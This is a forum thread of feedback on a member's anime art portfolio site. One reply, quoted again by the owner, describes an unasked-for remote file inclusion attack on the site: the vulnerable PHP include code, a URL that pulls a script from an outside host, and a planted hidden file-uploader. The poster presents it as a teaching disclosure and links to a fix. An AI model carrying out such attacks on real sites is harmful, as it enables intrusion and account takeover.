My site!

H

HyDr@

New Member
Messages
268
Reaction score
0
Points
0
http://www.hydra-art.net/

its kind of my portfolio, it also offers anime wallpapers.

Some comment and support would be appreciated.
biggrin.gif
 
Spartan Erik

Spartan Erik

Retired
Messages
6,764
Reaction score
0
Points
0
I'm not a fan of anime but I can tell you're quite talented; I love your website design, it has a nice color scheme to it

9/10, only because I'm not a fan of anime; otherwise, a 10/10
 
A

Articz

New Member
Messages
864
Reaction score
0
Points
0
i also like your layout i wish i could design layouts like that for my sites :( i like the colours used as it the images stand out much more.
10/10 here

and i not a anime fan either :)
 
mikel2k3

mikel2k3

New Member
Messages
748
Reaction score
0
Points
0
I like it :D
10/10... I need to start making better designs

well done
 
The_Magistrate

The_Magistrate

New Member
Messages
1,118
Reaction score
0
Points
0
The design is pretty sweet. Interesting color scheme. Although, you have some black on dark grey headings in the menu on the right. Kinda hard to read. Your wallpapers are fantastic. Biggest drawback is that you used tables for layout, which is a big pet-peeve of mine. 7/10
 
Bryon

Bryon

I Fix Things
Messages
8,149
Reaction score
101
Points
48
Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have. ;)

On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.

I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])

In your script you are including files in a way similar to:
PHP: 
..
$filename = $_GET['p'];
include($filename .'.php');
..

You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )

If you include a file into a PHP script, and that file contains PHP tags, ("<?
PHP: 
 and ?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:

[INDENT][URL="http://nedren.com/help/poc_write.txt?"]http://nedren.com/help/poc_write.txt?[/URL][/INDENT]

And include in into your script:

[INDENT][URL="http://www.hydra-art.net/index.php?p=http://nedren.com/help/poc_write.txt?"]http://www.hydra-art.net/index.php?p=http://nedren.com/help/poc_write.txt?[/URL][/INDENT]

Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename? 

The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:

[INDENT][URL="http://www.hydra-art.net/PoC_NedreN.hidden.php"]http://www.hydra-art.net/PoC_NedreN.hidden.php[/URL][/INDENT]

As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.

The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You [B]never[/B] can trust that data supplied by a visitor is "clean" and not harmful in any way at all.

So yeah, I showed you how I did this, so now I'll show you how to fix it.

Please read this, which will help you secure your script fully:

[INDENT][URL="http://forums.x10hosting.com/showthread.php?t=12620"]http://forums.x10hosting.com/showthread.php?t=12620[/URL][/INDENT]

If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.

Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.

Adios,
  -Bryon
 
Last edited:
H

HyDr@

New Member
Messages
268
Reaction score
0
Points
0
Bryon said:
Ok ok, big big comment and suggestion. This doesn't apply to the overall site, design, theme, or content though. It applies to security which you *don't* have and *need* to have. ;)

On your site you have a "system" set up to include files based on whatever is in the "p=" variable in the URL. ($_GET['p']) The way you have it set up, you do *not* filter anything at all, allowing anyone to include basically any file they want. This is a very bad thing.

I took the liberty to try out a few things to show you how easily I can gain access to every file in your home directory. (/home/[Username])

In your script you are including files in a way similar to:
PHP: 
..
$filename = $_GET['p'];
include($filename .'.php');
..

You do not filter what is included at all. Any person can include whatever they want. (Stressing this point.. )

If you include a file into a PHP script, and that file contains PHP tags, ("<?
PHP: 
 and ?>"), the script will parse that as if it is a normal script. Thus allowing me to create a text file:

[INDENT][URL="http://nedren.com/help/poc_write.txt?"]http://nedren.com/help/poc_write.txt?[/URL][/INDENT]
And include in into your script:

[INDENT][URL="http://www.hydra-art.net/index.php?p=http://nedren.com/help/poc_write.txt?"]http://www.hydra-art.net/index.php?p=http://nedren.com/help/poc_write.txt?[/URL][/INDENT]
Notice how I had to place a "?" at the end to make the script not count the ".php" you append to the end of the filename? 
 
The script in that text file is parsed, and it created a PHP file named 'PoC_NedreN.hidden.php' in your public_html directory, which contains a file uploader:

[INDENT][URL="http://www.hydra-art.net/PoC_NedreN.hidden.php"]http://www.hydra-art.net/PoC_NedreN.hidden.php[/URL][/INDENT]
As you can see, I could now upload whatever files\scripts that I want to, allowing me to have access to just about everything with your account.
 
The reason I'm telling you this is to teach you and help you to learn about how to protect against this kind of thing for future reference. You need to validate user supplied data at all times. You [B]never[/B] can trust that data supplied by a visitor is "clean" and not harmful in any way at all.
 
So yeah, I showed you how I did this, so now I'll show you how to fix it.
 
Please read this, which will help you secure your script fully:

[INDENT][URL="http://forums.x10hosting.com/showthread.php?t=12620"]http://forums.x10hosting.com/showthread.php?t=12620[/URL][/INDENT]
If you have any questions, please ask. Also, I would secure this as soon as possible. I'm surprised with the amount of hits your site gets that no one has done this and "hacked" your site.
 
Also, I hope doing this didn't/doesn't make you upset or mad at me. I did it to attempt to teach you and help you out, not to be malicious.
 
Adios,
-Bryon[/quote]
 
no, its fine :biggrin: , i actually know theres some big security problem there, i just didnt really have the time earlier (exams) to try and fix it.
Click to expand...
 
oab

oab

New Member
Messages
918
Reaction score
0
Points
0
site suspended, awwww, i really wanted to see it...
 
oab

oab

New Member
Messages
918
Reaction score
0
Points
0
wow your very talented, i suk at art and crap like that.
 
Theotherside

Theotherside

New Member
Messages
60
Reaction score
0
Points
0
Wow! I must commend you on your site! It's very nice, I love the top imagine, and all of the others you've put up (that I saw). Overall your site looks very clean and sharp. What anime show(s) is the top imagine from? To recap, I guess I'll say 9/10, just because perfect isn't possible! Great job!
-The Other Side
 
You must log in or register to reply here.
Top